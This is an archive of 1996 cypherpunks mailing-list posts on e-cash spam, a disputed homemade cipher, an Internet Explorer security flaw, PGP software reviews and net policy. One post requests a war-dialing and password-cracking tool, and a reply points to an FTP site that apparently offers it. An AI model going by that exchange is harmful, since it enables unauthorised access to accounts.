>crypto to prevent "minting".  It uses records to prevent replays.  In other
>words, it'd be like Ed McMahon including a quarter in the envelope.  You'd only
>be able to use it once....

Maybe I misspoke; I wasn't referring to minting e-cash.  I was referring to
the fact that if you can get spammers to enclose a 20e coin for every junk
e-mail advertisement you agree to read, then you can write a mail reader
that will read their spam and collect all their 20e coins.  To me, that's
better than "minting" e-cash.  Totally legal, and the net effect transfers
funds from the spammers to me.

The rest of my letter was in regards to writing that mail reader.  And no,
even if they were to succeed at getting stupid users to install their own
special mail reader just for the privilege of reading their advertisements,
without secure hardware in the users' machines, their mail server would not
be secure against a spoofing attack.

John
--
J. Deters  "Captain's log, stardate 25970-point-5.  I am nailed to the hull."
+-------------------------------------------------------+
| NET:   jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:  1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'36"N by 93^16'27"W Elev. ~=290m (work)   |
| PGP Key ID:  768 / 15FFA875                           |
+-------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Wed, 28 Aug 1996 06:42:11 +0800
To: cypherpunks@toad.com
Subject: A _REALLY_ Interesting Bet
Message-ID: <199608272002.OAA27298@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Betting on football is one thing, but some of us would be very
interested in the odds on US presidential election outcomes as
November approaches. This kind of betting is illegal here, and
I haven't looked lately for a "Ladbroke's" type site, but it is
interesting because the betting odds from across the Atlantic
more closely match eventual election results than the annoying
calls from Gallup & Roper during suppertime. I have posted here,
anonymously, on this topic before, but some of you are aware of
who I am. I'll thank you to keep that a secret. ;}






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Wed, 28 Aug 1996 05:39:58 +0800
To: cypherpunks@toad.com
Subject: Re: libelous action
Message-ID: <9608271817.AB19462@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 26 Aug 96 at 20:28, Ross Wright wrote:

 
> If I was John E. Holt, I would take a different public relations 
> tack.  I would seek positive input, not a negative reaction to 
> criticism.  Or I would ignore the critique altogether.
> Ross Wright

Yes Ross, but while writing this, your premise is that Holt has a 
product that is at least partially decent and that it could maybe be 
improved.  You assume he might be making an honest error.

Maybe it is not the case. 

;)

jfa

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael T. Babcock" <mbabcock@tyenet.com>
Date: Wed, 28 Aug 1996 08:04:44 +0800
To: mpd@netcom.com
Subject: Re: $10K offer if you can break the code
Message-ID: <199608272124.OAA02407@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: mpd@netcom.com, cypherpunks@toad.com
Date: Tue Aug 27 17:17:57 1996
Date: 23 Aug 96 13:59:38 EDT
 From: "JOHN E. HOLT" <76473.1732@CompuServe.COM>
Subject: secret message
To: <mbabcock@tyenet.com>

Date:  01-Aug-96 14:50 EDT
 From:  JOHN E. HOLT [76473,1732]
Subj:  puzzle

        ^%}{{
ZZ
VVPAGMIGJEKMCCHIAKKPEHJDDDLOABGAMMJOCDFNOLNOKKKNIADPBGPPOEPIDCEMPGWW
VVFCMOPKLKPJOHCNCJBDGOOJKFANCJJBDBMDIFIEKEDPLKDDGMPLHMIIPIJFMKOLENWW
VVCAKJGJCKPAEOOMLJPNFJEKEINIHFKHNOLPCAHLEKHHLMHJFCOEKAFAGPHJBCPBHBWW
VVOKLAENICAFDHEOEODMHMFGIONMAACAOHEOHDAJDNENGAHABNHGOCCPJNFDMAMKADWW
VVMGDHKGPKBEIDBNLOCMLFMEIOKBFBFKJIMIIIFKJDFENCBPAPFBAOFMHEDODBFFPDWW
VVOMFFJBNGEJPLGHJLFOBLFOGCBKAACEICLBIKHGILKCLMHPFIAHPDEOOODPPMLGDNWW
VVGLDNEBDINMILDJDOJOJNKCLIBBKBCBEJPBJCFHGKMFLLEPGLGOOIIGAKJEGNPFHDWW
VVIJBMFLALHPEHHGEGPCLGILBDBMEGMOGOIFBPPONGEDJPNFNMPCJFJPAEMIDOEMBLWW
ZZ
ZZ



Distribution:

To: ME > [76473,1732]


Message Copyright 1996, Michael T. Babcock
http://www.cyberbeach.net/~mbabcock

Send a message with the subject "Send public key" to
receive an automatic reply with my public key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: ascii
Comment: http://www.cyberbeach.net/~mbabcock/PGP/

iQC1AgUBMiNmCttTCwP6TF2xAQG65AT9GW2JbpaAo26USWptnLhhdaHWXbvDEi2i
35KWFHPWnlfJmj7NiUz+YKAV1aoHJssbGGUKIGoU1R0AV9NepGcODRwamrpZMXZ2
2TWIjgc0NbI+G9PNJrtc9h0XhsWV+w9upF0Yr1uCdCMtsdQtMKGguPzfd3+CfOkq
X5kSv4WIhi22WYwHHlyEyEMPrxMo60ey1EFUUctBYLqgl91omsR+qg==
=wEv6
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 28 Aug 1996 08:25:59 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft Explorer security hole (fwd) MSoft's reply...
Message-ID: <3.0b11.32.19960827142515.009f60f0@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Displaying warning dialogs in browsers and using default settings so as not
to auto run macros are only bandages to this problem.

Consider the following:

By using API routines to access the Win95 registry, someone writes a macro
virus (or even just a garden variety trojan) that turns off the warning
levels for MSIE which are stored in the registry (I haven't had time to
look, but I'm assuming they're there).

The user has no idea the setting has been changed, and is never warned when
evil, malicious, unsigned code is executed.  Until too late.

The registry, or whatever file you're saving state values to, should have
some form of write authorization associated with it.  Encryption would also
be extremely nice for privacy's sake (check out a Windows .INI file or
registry entry some time, and see what little tidbits of information are
being stored there).

In my experience, one of Microsoft's main problems when it comes to security
has been its developers and program/product managers don't think like "bad
guys" when it comes to design and subsequent exploits and holes.
Unfortunately, the user is the ultimate loser.

Joel

BTW - The paranoid side of me wouldn't be surprised to see PC
"espionage-enabled" viruses and trojans within the next few years.  Their
main purpose would be to either disable or patch various security features
for later attacks, or directly snatch information off of hard drives and
send it out over the Net.  I know of a few lab projects of a similar nature,
that were very easy to implement.

>Date: Thu, 22 Aug 1996 15:49:33 -0700
>From: Thomas Reardon <thomasre@MICROSOFT.com>
>Subject: Re: Internet Explorer security problem (Felten, RISKS-18.36)
> 
>  >We have discovered a security flaw in the current version (3.0) of
>  >Microsoft's Internet Explorer browser running under Windows 95.  An
>  >attacker could exploit the flaw to run any DOS command on the machine 
>  >of an Explorer user who visits the attacker's page.
> 
>We now post the virus warning dialog on local files (file: urls).  We have
>always posted it on remote files (http: urls).  Note that the root of the
>problem is not Java or the browser, but in macro-enabled applications.  IE3
>has a mechanism to warn users about safety of documents when used with
>common macro-enabled applications.  We are have updated Microsoft Word such
>that by default it will not run macros embedded in documents.
> 
>-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 27 Aug 1996 23:05:02 +0800
To: cypherpunks@toad.com
Subject: Re: The POOCH
In-Reply-To: <960826234448_76473.1732_BHT119-3@CompuServe.COM>
Message-ID: <3222E9E9.237C228A@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


JOHN E. HOLT wrote:
> 
> The Pouch uses a 64 x 64 block product cipher, a 1024 bit random initialization
> vector and the CBC technique.  Most experts agree that such an implementation
> is highly resistant to all forms of cryptographic attack.
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Wow!  Resistant to those not invented yet - I guess this means one of
two things - the pooch is a OTP, or Mr. Holt has a time machine.

> Hellman and Dilfie rely on knowing the algorithm for their known plain text attacks

> An unpublished algorithm forces them into reverse engineering the computer
> programs to learn the algorithm. The POUCH has many roadblocks built in
> to prevent this.

Wow! (again).  Dongleless protection!  I'm impressed.  Now we don't need
tamper resistant smart cards - we can do it all in software!

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06 
^S
^A^Aoft FAT filesytem is extremely robust, ^Mrarely suffering from^T^T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael T. Babcock" <mbabcock@tyenet.com>
Date: Wed, 28 Aug 1996 08:37:47 +0800
To: geoff@commtouch.co.il
Subject: Re: (NOISE) Re: Free Pronto Secure Offer
Message-ID: <199608272136.OAA02567@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: geoff@commtouch.co.il, cypherpunks@toad.com
Date: Tue Aug 27 17:29:43 1996
> To: unicorn@schloss.li, cypherpunks@toad.com
> Date: Fri Aug 16 02:41:34 1996
> Unicorn,
> 
> > No, I was merely pointing out that if the review revealed that it
> > had problems (one assumed that the intent of peer review is to reveal
> > such problems in the first place, but perhaps you just like giving
> > software away?) then the offered reward was valueless.

No, actually, after having pointed out one (and found another) bug in 
Pronto Secure, I find it to be an amazing piece of software!  It does 
everything with PGP and although it's slow at adding new keys (I presume it 
always checks the signatures down a few levels every time it adds one, and 
thus justifiably slower then straight adding a key) it's fast, efficient, 
and fairly easy to use.

I must admit that of the "View/Save/Inspect" options, only "Save" is very 
clear and the rest are (excuse the pun in advance) cryptic at best.

However, the methods used for the cryptography seem to be sound and after 
monitoring my COM transmissions, I haven't had it sending my secret key 
ring out ... ;) ... (unless they're hiding it in tiny packets ;)

> Peer review seems to have voted that their risk paid off.

My vote's in.  Thanks for the software!

> > Cypherpunks is always getting the cash poor developer who thinks he
> > very clever because he has to pay testers no money if he offers his
> > new product free to the person who discovers a flaw, or writes a
> > review.

        I actually think that Commtouch will not be cash poor in a few 
months ...

> > From your home page, I would guess that you request that reviewers
> > allow you to make their comments public.  That's called an
> > endorsement, and, by the way, people are usually paid for them.
> > Sometimes in the millions. Think Michael Jordan is getting a deal
> > when you use his name to promote your product and then give him a
> > $99.00 piece of software (which is effectively worth the amount of
> > time it takes to write a few kiss ass paragraphs on the software, not
> > $99.00)?

That's because they're famous and their opinion is considered to be very 
good.  I could see them paying Phil Zimmerman to endorse it publicly, but 
it wouldn't matter much because the mainstream people (the ones they're 
targetting with Pronto Secure) don't know who Zimmerman is ... so it's not 
worth they're money ...!

> I venture that most c'punks would agree that moving strong e-mail
> security into mainstream is a good thing. This is not going to happen
> without people making money from it.

Definately...
Message Copyright 1996, Michael T. Babcock
http://www.cyberbeach.net/~mbabcock

Send a message with the subject "Send public key" to
receive an automatic reply with my public key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: ascii
Comment: http://www.cyberbeach.net/~mbabcock/PGP/

iQC1AgUBMiNo19tTCwP6TF2xAQHwUgUAlJGE5ZU0xV7Hx3u7+/MRv+n83Kn9ZxsE
8igHrEjLwVbfBC9ivoZ7aonm/misAdy2jr77oowPcvuE3t750oCMCfb+AdhUPQGx
Knu29L4XNbgpUH+t5rCCqUiSM7EHIYtmURBjrmDSAADIH3vcd8b9Cc6T5soNIQK+
Nsy9hve+ly+4nVwujNKqAhOCvIMBn+wK/K+ifbAvGbXP65YQFktp4Q==
=AF5P
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael T. Babcock" <mbabcock@tyenet.com>
Date: Wed, 28 Aug 1996 08:29:24 +0800
To: unicorn@schloss.li
Subject: Re: (NOISE) Re: Free Pronto Secure Offer
Message-ID: <199608272140.OAA02638@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: unicorn@schloss.li, cypherpunks@toad.com
Date: Tue Aug 27 17:33:42 1996
> So would I, however, the assumption that "cypherpunk crypto review
> services" are to be had for nothing is the height of arrogance.

They've already got a lot of us reviewing it... sorry, it's not arrogance 
- -- they were right.

> If you were sincere, you'd thank them with cash.  Afterall, you seem
> to suggest that you have a good deal of liquidity eh?

Actually, they lose $99 each time they give us a free copy of the software 
... in case you're not as good in accounting as you think you are in 
crypto.  I have no idea what your rep. is ... but I know one thing, they're 
offering an exchange of valuable software (market value: $99) for valuable 
services (crypto-rebel review)

> Uh, the kiss ass paragraphs were the reviewers comments, not your code.

I aggreed with the reviewers comments, they're mine too ... I've sent many 
long E-mails to people I do computer service for endorsing Pronto Secure.  
I have lined up 6 people who wish to purchase it.  This is for real pal.  
If you don't like it, get out of the ring.  Some of us want our PGP to be 
nice and easy like E-mail used to be.
Message Copyright 1996, Michael T. Babcock
http://www.cyberbeach.net/~mbabcock

Send a message with the subject "Send public key" to
receive an automatic reply with my public key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: ascii
Comment: http://www.cyberbeach.net/~mbabcock/PGP/

iQC1AgUBMiNpvNtTCwP6TF2xAQGKSwT+Lg+uEKBX9yUfZvkZ6tO32fhilvb65sgJ
lpH2MPIArTKIYw/nD4UGQbQPTtx/9+1ASx5V+uqmquy7t/yfbuajrmsuLjnGBc/D
tYxAxRl31+sU3N8X2ie54X1VWcLzgqfXCByuTYIHPPkeHjk7kWJfwTqXZsLV/ZZp
NYGaL6OWq+DXWN3IYxd43fVdfi6qzCxDjseIdAdoV4J7TCjOUCNXbg==
=WqpJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 28 Aug 1996 07:49:41 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Edited Edupage, 18 Aug 1996 [SATELLITES]
In-Reply-To: <199608271609.JAA12761@mail.pacifier.com>
Message-ID: <199608272046.PAA12319@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
> >I'd worry far more about the stresses of launch bothering
> >the drives.
> 
> That's not a problem at all.  Most modern drives are rated for 10's 
> of G's, non-operating.  Satellite launches are probably a breeze 
> compared to this.

I remember reading that Russian satellite launches with people aboard
had acceleration of about 9-10G.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
Date: Wed, 28 Aug 1996 06:38:52 +0800
To: cypherpunks@toad.com
Subject: Boeing Antenna Demos T1 Reception Rates
Message-ID: <9608271954.AA15230@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  	  				 
WASHINGTON, DC, U.S.A., 1996 AUG 27 (NB) -- By Bill Pietrucha. All  
eyes were on the truck as it meandered its way down the twisting 
mountain road in northern Bosnia. Except the eyes didn't belong to 
lookouts in an observation post along the road. They were in a 
modified US Air Force (USAF) C-135 flying at 35,000 feet along 
the East Coast of the United States, some 6,000 miles away. 

The USAF C-135, known by the name Speckled Trout, was participating  
in the 1996 Joint Warrior Interoperability Demonstration (JWID `96). 

JWID `96 is the eighth in a series of technology demonstrations  
designed to identify command, control, communications, computer, and 
intelligence (C4I) problems between the armed services, demonstrate 
improved operational capabilities for deployed forces, and promote 
interoperability among existing and emerging C4I systems needed to 
support a joint task force. 

As part of the exercise, the Air Force installed the first full-scale  
prototype Ku-band phased array receive antenna system on the 
Speckled Trout, a modified avionics testbed aircraft maintained by the 
412th Flight Test Squadron at Edwards Air Force Base, California. 

The antenna, developed by Boeing Co., is capable of receiving broad-  
band, high data rate satellite communications, with civilian as well 
as military applications, Boeing spokesperson Charles Ramey told 
Newsbytes. 

According to Ramey, the antenna will "revolutionize mobile satellite  
communications by increasing the data flow by thousands of times over 
current capabilities." 

Depending on the satellite and receiver, he said, rates of up to 30  
megabits-per-second (Mbps) may be realized through a single transponder. 

"To date, satellite communication to mobile platforms has been limited  
to relatively narrow bandwidths, and wide band communication has 
been subject to the limits of antenna technology," Ramey told 
Newsbytes. 

The Boeing design can be adapted to simultaneously receive signals  
from multiple satellites in different orbits with a single antenna. 
The electronically steered antenna also allows for rapid switching 
between different satellites. 

During the JWID exercises, which will continue through August 30,  
the Boeing antenna system is being used to receive satellite 
transmitted video and data to support the Global Broadcast Service 
(GBS) mission. GBS, Ramey said, is designed to provide the military 
with a worldwide, seamless, high-throughput broadcast information 
service to support current and future defense objectives. 

As one Air Force Colonel at MacDill Air Force Base in Tampa,  
Florida, told Newsbytes, "GBS is the CNN of the warfighter." 

EchoStar, a key member of the antenna demonstration team,  
transmitted video in Digital Video Broadcast (DVB) format for 
reception by the Boeing antenna system on the Speckled Trout. 

In addition to the video, an uplink data stream at T1, or 1.5Mbps,  
or higher is generated at the GBS uplink terminal testbed at the 
Operational Support Office facility located at the Naval research 
Facility near Washington DC. 

This signal, according to Ramey, is relayed through the GBS  
Americom K2 FSS satellite which downlinks to a receiver at an 
EchoStar facility. The data is then incorporated into the network 
broadcast system and retransmitted via the EchoStar 1 satellite 
to a GBS receiver. 

The data is then stored for retrieval by other systems, Ramey said,  
including the Global Command and Control System (GCCS), sponsored 
by the Air Force Communications Agency, and the Combat Information 
System, sponsored by the Air Intelligence Agency. 

"Other systems on board the Speckled Trout can retrieve data through  
the Boeing phased array antenna system, which is routed to terminals 
inside the aircraft for display and demonstration," Ramey said. 

The Speckled Trout also can track and receive video and data from  
EchoStar Dish Network TV, Hughes DirectTV, and USSB transmissions 
for display on a conventional monitor, Ramey said. 

Looking to commercial applications, Ramey said the phased array  
communication antenna system "offers the ability to provide 
passengers with more entertainment and information options. With 
the Boeing antenna system on board, passengers can have access to 
the entire spectrum of commercial television programming available 
from a BSS satellite." 

Ramey said the antenna system is capable of instantaneously  
bringing in approximately 100 channels from a given BSS satellite. 

(199670826/Press Contact: Charles Ramey, Boeing Defense & Space  
group, 206-657-1380) 
  	   	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 28 Aug 1996 06:30:49 +0800
To: Manuel Benedicto Procas <mbened@encomix.es>
Subject: Re: please help
In-Reply-To: <v03007802ae48e6335946@[194.143.199.163]>
Message-ID: <199608272004.QAA29553@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Manuel Benedicto Procas writes:
> Please...you know a macintosh program in order to war dialing TCP IP
> numbers and Unix or VMS localice Login/password cobinations.
> 
> MANUEL

Check the ftp site at fcd-3.gue.org

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Wed, 28 Aug 1996 06:51:55 +0800
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608271620.LAA10933@manifold.algebra.com>
Message-ID: <Pine.SCO.3.93.960827160057.5158A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 27 Aug 1996, Igor Chudov @ home wrote:

> Adam Shostack wrote:
> > 
> > A few weeks back, I posted a request for source code review
> > guidelines.  I got about 50 me-toos, but no guidelines.  So I wrote
> > some I think are decent.  They're still in draft format.  I'd
> > appreciate feedback & commentary on them.
> > 
> > http://www.homeport.org/~adam/review.html
> > 

Sorry.  I missed your first post.

The Security Engineering CMM effort has also been looking at methods that
are used to create assurances in trusted systems/components/products.  One
of these is, of course, code examination and quality reviews.  You may
want to check out what they've done.  There are not necessarily "steps" to
be followed, but rather how the PA (process area) relates to the ability
of an organization to perform security engineering (i.e., it's maturity).
I haven't been in the PA's for awhile, but there *may* be something there
that you can use.

GRCI sits on both the authoring group and the steering committee for the
SSE CMM.  If you need more info, let me know and I'll hook you up with
someone.  The group is always looking for someone to test the
implementation of the security engineering CMM products through pilot
testing.

Point your browser at http://www.ssecmm.ashton.csc.com/
and then rummage.  There's stuff buried all over the server, but you
probably will be most interested in the peer review, security
vulnerability analysis, and quality management portions.  As I recall (I
can't get to the site right now), a lot of stuff is in RTF and not HTML,
so you may have to DL it instead of look at it online.

------------------------------------------------------------------------- 
|And if Dole wins and dies in office, they|        Mark Aldrich         |
|could just pickle him and no one would   |   GRCI INFOSEC Engineering  |
|notice.  It wouldn't be the first time we|     maldrich@grci.com       |
|had a dill-dole running the country.     | MAldrich@dockmaster.ncsc.mil|
|               -- Alan Olsen             |                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Osborne, Rick" <OSBORRI@msmail.northgrum.com>
Date: Wed, 28 Aug 1996 07:20:07 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Real-time key server
Message-ID: <32235B6D@smtpmmp2.northgrum.com>
MIME-Version: 1.0
Content-Type: text/plain



Okay, I was told to not post to the list until I'd:
1. Lurked for a month,
2. Figured out who Detweiler was,
3. Found out about BlackNet and DC Nets,
4. Learned of at least three of David Chaum's innovations.
And at that point "[I] may be ready to post [my] first comments."

Well, dammit, I can't wait that long.  I need help now.  I've only been on 
for 2 weeks, I have no clue who Detweiler is (other than the
welcome message I haven't heard two words about him/her/it), and I know 
enough to sound stupid about the other stuff.  But if you still think I'm 
worthy of listeneing to, then read on.

I work for Northrop Grumman Corp (SBMS division) when I have been tasked to 
create a program for reciept of online forms.  The entire division is 
wanting to go paperless, and I am the sole person doing it.  (Yes, I'm going 
for pity here.)

I am writing my own CGI remailer for insecure forms, but some of them
have to be secure.  I think the best way to go about this is a public-key 
system with both keys stored locally and the public keys stored on a 
networked database (for routing purposes; ie, it has to go through managers 
and admin and will be verified and digitally signed with each hop).  Now, of 
course, acces to the public keys will be through a key server.

This is where I come into my problem.

In my research into keyservers, I find that none of them are realtime. 
 Sure, there are CGI interfaces to them, but that's not what I mean.  I was 
hoping for something along the line of a Finger or SMTP protocol, such that 
a client connects to a host (say, keyserv.northgrum.com) on a certain port 
(say, 5397) and goes through a realtime version of what is accomplished via 
email.

Something like:
[connect]
client>GET osborri
server>200 OK
server>-----Begin . . .

and so forth.

Now.  Yes, I am intelligent enough to implement something like this. 
 (Actually, that's debatable, but it's also besides the point.) What I want 
to know is this: Is there a realtime implementation out there already?

Why?  Because:
1. I do not want to reinvent the wheel.
2. I would like to conform to existing standards.

Now, if the answer is a 'no', then who wants to draft a quickie RFC?

 -oz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 28 Aug 1996 09:30:11 +0800
To: wb8foz@nrk.com
Subject: Re: FYI: GOP's Stolen Laptop...
In-Reply-To: <199608272041.QAA01816@nrk.com>
Message-ID: <9608272141.AA00390@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Steve O sez:
> > Front page of the New Jersey Star Ladger:
> >
> > "GOP's Stolen Laptop had credit card Details"

David Lesher responds:
> They should have used PGP on those files.....

...but I thought fine, upstanding, and law-abiding citizens didn't have  
anything to hide...


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 28 Aug 1996 07:15:38 +0800
To: privsoft@ix.netcom.com (Steve O)
Subject: Re: FYI: GOP's Stolen Laptop...
In-Reply-To: <1.5.4.16.19960827112653.295f6afc@popd.ix.netcom.com>
Message-ID: <199608272041.QAA01816@nrk.com>
MIME-Version: 1.0
Content-Type: text


Steve O sez:
> 
> FYI:
> 
> Front page of the New Jersey Star Ladger:
> 
> "GOP's Stolen Laptop had credit card Details"

They should have used PGP on those files.....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raffetto@podesta.com (John Raffetto)
Date: Wed, 28 Aug 1996 07:35:22 +0800
To: owner-fight-censorship@vorlon.mit.edu
Subject: Re: Sen. Leahy's "impeccable cyberspace credentials"
Message-ID: <199608272057.QAA01534@podesta.com>
MIME-Version: 1.0
Content-Type: text/plain


Josh Crockett is exactly right here...

>  It would seem 
>that we need to hunt down our issues and support them, seeing as that 
>politicians are notoriously unreliable on supporting every single issue 
>we would like them to support.

And that's why Declan's message about Leahy is foolish.  When you find a
champion on the Hill for one issue, you rally around him/her.  And when they
won't support you on another issue, you find another champion. If your
policy is to disown Hill allies (in this case, Leahy) who break ranks with
you from time to time, you'll quickly run out of allies.  And when you have
no allies on the Hill, you're really screwed.

John Raffetto






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Hagerty <hag@ai.mit.edu>
Date: Wed, 28 Aug 1996 08:12:30 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608270158.UAA24640@homeport.org>
Message-ID: <199608272111.RAA23997@galapas.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


 > From: ichudov@algebra.com (Igor Chudov @ home)
 > Date: Tue, 27 Aug 1996 11:20:56 -0500 (CDT)
 >
 > Look at your sendmail.cf file for a humongous amount of
 > email parsing rules.

    Much better, look at rfc822.  (I wouldn't consider *anything* that
has the word "sendmail" in it a good reference).

    Hostnames will match the regexp [-A-Za-z0-9.]; those are the only
legal characters in the hostname portion.  Usernames
("domain-dependent local string") are much harder to what is and isn't
legal.  Read rfc822.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Senescall <apache@quux.apana.org.au>
Date: Tue, 27 Aug 1996 17:58:20 +0800
To: cypherpunks@toad.com
Subject: Threat to Australian internet WAS Re: USPS
In-Reply-To: <Pine.BSI.3.91.960826085230.20367B-100000@wichita.fn.net>
Message-ID: <Pine.LNX.3.91.960827164126.511G-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 26 Aug 1996, Bruce M. wrote:

If u think this is a worry, u should take a look at what the government 
owned monoploly telco here in Australia is doing..

On Mon, 26 Aug 1996, Bruce M. wrote:

> On Fri, 23 Aug 1996, 
William H. Geiger III wrote: > 
> > Once in place all the goverment needs to do is ban all e-mail not sent
> > through their system. Add this to the outlawing of all non-keyescrowed 
> > encryption, and the ability to archive all messages sent through their 
> > system. Now the goverment would have total access to everything you 
> > wright. 
> 
>     Why not?  I believe it is already illegal to place anything in a 
> person's physical mail box that the post office hasn't processed.  For 
> the sake of preserving the 'integrity and security' of the Internet I 
> can see the govt. taking such future actions.

Or 'they' can use our Telco (Tel$tra) 's approach and introduce 
_timecharged_ local data calls as it is trying to do here in Australia.

What better or easier way to destroy our meagre outlet for free speech 
than to cost it out of existance.

See Stewart Fist's excellent article on the subject currently available 
on "The Australian" newspapers site:

<A HREF="http://www.australian.aust.com/computer/columns/fistcom.htm">

See also draft legislation at

<A HREF="http://www.dca.gov.au/govtpol.html">

and Universal Telco Service Obligations at

<A HREF="http://www.dca.gov.au/"> (many references) 

They took our firearms last month..they're comin back for the net this month.

-- 
   .////.   .//    Charles Senescall            apache@quux.apana.org.au
 o:::::::::///     Fuck TEL$TRA          
>::::::::::\\\     Finger me for PGP PUBKEY           Brisbane AUSTRALIA
   '\\\\\'   \\    http://quux.apana.org.au/~apache/ 
    DO something for your country: Butt slap a politician this xmas







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 28 Aug 1996 11:39:58 +0800
To: cypherpunks@toad.com
Subject: Hayek (was: Cato Institute conference on Net-regulation)
Message-ID: <ae48e75e01021004001f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:05 PM 8/27/96, Declan McCullagh wrote:
>This should be a good half-day conference, with some interesting
>speakers. I'll probably show up for Charles Platt's keynote.
>
>Naturally, it's being held in the building's Hayek Auditorium. Hayek has
>some relevance to cypherpunks, I think -- he warned early on that the
>loss of economic freedom inevitably leads to the loss of civil liberties
>as well.
>
>He also described the phenomenon of spontaneous order (admittedly in the
>context of markets), which speaks to the way the Net has ordered itself.

Indeed, Hayek has had a _lot_ to do with the Cypherpunks! From "The Road to
Serfdom" to "Law, Legislation, and Liberty," his works have exerted a
profound influence on me, and on many others.

Lots of connections, from ur-Cypherpunk Phil Salin having worked with him,
to  special Hayek issues of magazines also featuring Cypherpunk fellow
travellers like Mark Miller, and so on.

I described to Kevin Kelly the "emergent order" work Hayek did, for Kevin's
development of his ideas which later became "Out of Control." (I'm sure
Kelly was generally aware of Hayek, but I emphasized to him the importance
of his emergent order ideas as the underpinnings of anarcho-capitalism.)

(In fact, I would say Hayek would've been a candidate for being a cover boy
for "Wired"...assuming of course he was 60 years younger, had some of his
body parts peirced, and, even better, was a Netchick. Being instead a dead
white European male, he'll never be mentioned in "Wired.")

"Hayek -- Tired (Dead tired, in fact), Beavis -- Wired"

("Uh, like, economics like really sucks.")

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








